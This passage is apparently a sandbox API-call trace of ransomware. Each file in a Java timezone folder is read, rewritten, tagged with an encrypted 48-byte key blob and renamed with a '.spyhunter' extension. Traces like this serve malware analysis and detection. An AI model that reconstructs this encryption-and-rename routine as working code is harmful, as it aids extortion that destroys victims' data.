pbBuffer=0x270e6b8 | out: pbBuffer=0x270e6b8) returned 1 [0167.468] GetProcessHeap () returned 0x2c0000 [0167.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0167.468] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6b0*=0x30) returned 1 [0167.468] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4ADT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\ast4adt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.468] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4ADT") returned 59 [0167.469] StrStrW (lpFirst="AST4ADT", lpSrch=".txt") returned 0x0 [0167.469] GetProcessHeap () returned 0x2c0000 [0167.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0167.469] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e674, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e674*=0x8f0, lpOverlapped=0x0) returned 1 [0167.470] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff710, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.470] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x270e674, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e674*=0x8f0, lpOverlapped=0x0) returned 1 [0167.470] GetProcessHeap () returned 0x2c0000 [0167.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0167.470] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.471] WriteFile (in: hFile=0x178, lpBuffer=0x270e6b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e674, lpOverlapped=0x0 | out: lpBuffer=0x270e6b4*, lpNumberOfBytesWritten=0x270e674*=0x4, lpOverlapped=0x0) returned 1 [0167.471] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e674, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e674*=0x30, lpOverlapped=0x0) returned 1 [0167.471] CloseHandle (hObject=0x178) returned 1 [0167.471] GetProcessHeap () returned 0x2c0000 [0167.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.471] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4ADT.spyhunter") returned 69 [0167.471] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4ADT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\ast4adt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4ADT.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\ast4adt.spyhunter")) returned 1 [0167.472] GetProcessHeap () returned 0x2c0000 [0167.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.472] GetProcessHeap () returned 0x2c0000 [0167.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0167.472] GetProcessHeap () returned 0x2c0000 [0167.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebd880 | out: hHeap=0x2c0000) returned 1 [0167.472] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6b0 | out: pbBuffer=0x270e6b0) returned 1 [0167.472] GetProcessHeap () returned 0x2c0000 [0167.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0167.472] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6a8*=0x30) returned 1 [0167.472] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\ast4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.473] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4") returned 56 [0167.473] StrStrW (lpFirst="AST4", lpSrch=".txt") returned 0x0 [0167.473] GetProcessHeap () returned 0x2c0000 [0167.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0167.473] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e66c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e66c*=0x1b, lpOverlapped=0x0) returned 1 [0167.474] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.474] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x270e66c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e66c*=0x1b, lpOverlapped=0x0) returned 1 [0167.474] GetProcessHeap () returned 0x2c0000 [0167.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0167.475] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.475] WriteFile (in: hFile=0x178, lpBuffer=0x270e6ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e66c, lpOverlapped=0x0 | out: lpBuffer=0x270e6ac*, lpNumberOfBytesWritten=0x270e66c*=0x4, lpOverlapped=0x0) returned 1 [0167.475] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e66c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e66c*=0x30, lpOverlapped=0x0) returned 1 [0167.475] CloseHandle (hObject=0x178) returned 1 [0167.475] GetProcessHeap () returned 0x2c0000 [0167.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.475] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4.spyhunter") returned 66 [0167.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\ast4"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\AST4.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\ast4.spyhunter")) returned 1 [0167.476] GetProcessHeap () returned 0x2c0000 [0167.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.476] GetProcessHeap () returned 0x2c0000 [0167.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0167.476] GetProcessHeap () returned 0x2c0000 [0167.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4480 | out: hHeap=0x2c0000) returned 1 [0167.476] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6b0 | out: pbBuffer=0x270e6b0) returned 1 [0167.476] GetProcessHeap () returned 0x2c0000 [0167.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0167.477] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6a8*=0x30) returned 1 [0167.477] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\PST8PDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pst8pdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0167.477] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\PST8PDT") returned 51 [0167.477] StrStrW (lpFirst="PST8PDT", lpSrch=".txt") returned 0x0 [0167.477] GetProcessHeap () returned 0x2c0000 [0167.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0167.478] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e66c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e66c*=0x4f8, lpOverlapped=0x0) returned 1 [0167.551] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffb08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.551] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x4f8, lpNumberOfBytesWritten=0x270e66c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e66c*=0x4f8, lpOverlapped=0x0) returned 1 [0167.551] GetProcessHeap () returned 0x2c0000 [0167.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0167.551] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.551] WriteFile (in: hFile=0x178, lpBuffer=0x270e6ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e66c, lpOverlapped=0x0 | out: lpBuffer=0x270e6ac*, lpNumberOfBytesWritten=0x270e66c*=0x4, lpOverlapped=0x0) returned 1 [0167.551] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e66c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e66c*=0x30, lpOverlapped=0x0) returned 1 [0167.551] CloseHandle (hObject=0x178) returned 1 [0167.551] GetProcessHeap () returned 0x2c0000 [0167.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.551] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\PST8PDT.spyhunter") returned 61 [0167.551] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\PST8PDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pst8pdt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\PST8PDT.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pst8pdt.spyhunter")) returned 1 [0167.552] GetProcessHeap () returned 0x2c0000 [0167.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.553] GetProcessHeap () returned 0x2c0000 [0167.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0167.553] GetProcessHeap () returned 0x2c0000 [0167.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebe720 | out: hHeap=0x2c0000) returned 1 [0167.553] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6a8 | out: pbBuffer=0x270e6a8) returned 1 [0167.553] GetProcessHeap () returned 0x2c0000 [0167.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0167.553] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6a0*=0x30) returned 1 [0167.553] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Norfolk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\norfolk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0167.820] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Norfolk") returned 59 [0167.820] StrStrW (lpFirst="Norfolk", lpSrch=".txt") returned 0x0 [0167.820] GetProcessHeap () returned 0x2c0000 [0167.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0167.820] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e664, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e664*=0x4d, lpOverlapped=0x0) returned 1 [0167.820] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.821] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x270e664, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e664*=0x4d, lpOverlapped=0x0) returned 1 [0167.821] GetProcessHeap () returned 0x2c0000 [0167.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0167.821] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.821] WriteFile (in: hFile=0xb0, lpBuffer=0x270e6a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e664, lpOverlapped=0x0 | out: lpBuffer=0x270e6a4*, lpNumberOfBytesWritten=0x270e664*=0x4, lpOverlapped=0x0) returned 1 [0167.821] WriteFile (in: hFile=0xb0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e664, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e664*=0x30, lpOverlapped=0x0) returned 1 [0167.821] CloseHandle (hObject=0xb0) returned 1 [0167.821] GetProcessHeap () returned 0x2c0000 [0167.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.821] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Norfolk.spyhunter") returned 69 [0167.821] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Norfolk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\norfolk"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Norfolk.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\norfolk.spyhunter")) returned 1 [0167.822] GetProcessHeap () returned 0x2c0000 [0167.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.822] GetProcessHeap () returned 0x2c0000 [0167.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0167.822] GetProcessHeap () returned 0x2c0000 [0167.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec3dc0 | out: hHeap=0x2c0000) returned 1 [0167.822] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6a8 | out: pbBuffer=0x270e6a8) returned 1 [0167.822] GetProcessHeap () returned 0x2c0000 [0167.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0167.823] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e6a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e6a0*=0x30) returned 1 [0167.823] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chuuk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\chuuk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0167.823] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chuuk") returned 57 [0167.823] StrStrW (lpFirst="Chuuk", lpSrch=".txt") returned 0x0 [0167.823] GetProcessHeap () returned 0x2c0000 [0167.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0167.823] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e664, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e664*=0x41, lpOverlapped=0x0) returned 1 [0167.824] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.824] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x270e664, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e664*=0x41, lpOverlapped=0x0) returned 1 [0167.824] GetProcessHeap () returned 0x2c0000 [0167.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0167.824] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.825] WriteFile (in: hFile=0xb0, lpBuffer=0x270e6a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e664, lpOverlapped=0x0 | out: lpBuffer=0x270e6a4*, lpNumberOfBytesWritten=0x270e664*=0x4, lpOverlapped=0x0) returned 1 [0167.825] WriteFile (in: hFile=0xb0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e664, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e664*=0x30, lpOverlapped=0x0) returned 1 [0167.825] CloseHandle (hObject=0xb0) returned 1 [0167.825] GetProcessHeap () returned 0x2c0000 [0167.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.825] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chuuk.spyhunter") returned 67 [0167.825] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chuuk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\chuuk"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chuuk.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\chuuk.spyhunter")) returned 1 [0167.826] GetProcessHeap () returned 0x2c0000 [0167.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.826] GetProcessHeap () returned 0x2c0000 [0167.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0167.826] GetProcessHeap () returned 0x2c0000 [0167.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec34c0 | out: hHeap=0x2c0000) returned 1 [0167.826] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6a0 | out: pbBuffer=0x270e6a0) returned 1 [0167.826] GetProcessHeap () returned 0x2c0000 [0167.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0167.826] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e698*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e698*=0x30) returned 1 [0167.827] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chatham" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\chatham"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0167.827] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chatham") returned 59 [0167.827] StrStrW (lpFirst="Chatham", lpSrch=".txt") returned 0x0 [0167.827] GetProcessHeap () returned 0x2c0000 [0167.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0167.828] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e65c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e65c*=0x464, lpOverlapped=0x0) returned 1 [0167.914] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb9c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.914] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x464, lpNumberOfBytesWritten=0x270e65c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e65c*=0x464, lpOverlapped=0x0) returned 1 [0167.914] GetProcessHeap () returned 0x2c0000 [0167.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0167.914] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.914] WriteFile (in: hFile=0xb0, lpBuffer=0x270e69c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e65c, lpOverlapped=0x0 | out: lpBuffer=0x270e69c*, lpNumberOfBytesWritten=0x270e65c*=0x4, lpOverlapped=0x0) returned 1 [0167.914] WriteFile (in: hFile=0xb0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e65c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e65c*=0x30, lpOverlapped=0x0) returned 1 [0167.914] CloseHandle (hObject=0xb0) returned 1 [0167.914] GetProcessHeap () returned 0x2c0000 [0167.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.914] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chatham.spyhunter") returned 69 [0167.915] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chatham" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\chatham"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Chatham.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\chatham.spyhunter")) returned 1 [0167.916] GetProcessHeap () returned 0x2c0000 [0167.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.916] GetProcessHeap () returned 0x2c0000 [0167.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0167.916] GetProcessHeap () returned 0x2c0000 [0167.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec3400 | out: hHeap=0x2c0000) returned 1 [0167.916] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e6a0 | out: pbBuffer=0x270e6a0) returned 1 [0167.916] GetProcessHeap () returned 0x2c0000 [0167.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0167.916] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e698*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e698*=0x30) returned 1 [0167.916] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Uzhgorod" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\uzhgorod"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0167.944] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Uzhgorod") returned 59 [0167.944] StrStrW (lpFirst="Uzhgorod", lpSrch=".txt") returned 0x0 [0167.945] GetProcessHeap () returned 0x2c0000 [0167.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0167.945] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e65c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e65c*=0x41c, lpOverlapped=0x0) returned 1 [0167.954] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffbe4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.955] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x41c, lpNumberOfBytesWritten=0x270e65c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e65c*=0x41c, lpOverlapped=0x0) returned 1 [0167.955] GetProcessHeap () returned 0x2c0000 [0167.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 